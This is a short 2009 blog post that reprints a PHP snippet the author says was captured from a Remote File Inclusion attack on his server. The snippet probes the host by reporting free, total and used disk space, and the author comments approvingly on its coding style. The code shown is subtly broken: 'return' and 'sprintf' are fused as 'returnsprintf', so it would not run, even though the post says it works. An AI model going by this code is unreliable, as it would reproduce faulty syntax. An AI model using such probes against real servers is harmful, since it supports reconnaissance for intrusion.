Currently the posts are filtered by: php
Reset this filter to see all posts.

Best of RFI - Part 1

Posted in hacks/PHP/ on May 16, 2009 by Marcus.

Even a loser gets lucky sometimes

Like million other hosts in the internet, this box is attacked to exploit vulnerabilities.

I recently saw following piece of code in a Remote File Inclusion (RFI) attack. Although it might be created by a kid, it's still a nice snippet that I want to share with you. Guess what, it actually works.

Disclaimer: I'm unsure about the license.

<?php
function ConvertBytes($number){
        $len=strlen($number);
        if($len<4){
                returnsprintf("%d b",$number);
        }
        if(($len>=4)&&($len<=6)){
                returnsprintf("%0.2f Kb",$number/1024);
        }
        if(($len>=7)&&($len<=9)){
                returnsprintf("%0.2f Mb",$number/1024/1024);
        }
        returnsprintf("%0.2f Gb",$number/1024/1024/1024);
}                
       

$dir=@getcwd();

        // free
$freeBytes= disk_free_space($dir);
$freeUnits= ConvertBytes($freeBytes);
if(!$freeUnits)$freeUnits=0;

        // total
$allBytes= disk_total_space($dir);
$allUnits= ConvertBytes($allBytes);
if(!$allUnits)$allUnits=0;

        // used
$usedUnits= ConvertBytes($allBytes-$freeBytes);

       
echo('free: '  .$freeUnits."<br>\r\n");
echo('total: '.$allUnits  ."<br>\r\n");
echo('used: '  .$usedUnits."<br>\r\n");
?>

I personally like the CamelCase approach, the sprintf() usage and the early returns. What do you think?

Permalink | Comments: 2
Tags: php, rfi, , snippet
Views: 0

back

Categories

  • advisory(7)
  • book(1)
  • [-]database(1)
  • exploit(1)
  • hacks(2)
  • others(5)
  • PHP(1)
  • TYPO3(22)

Tag cloud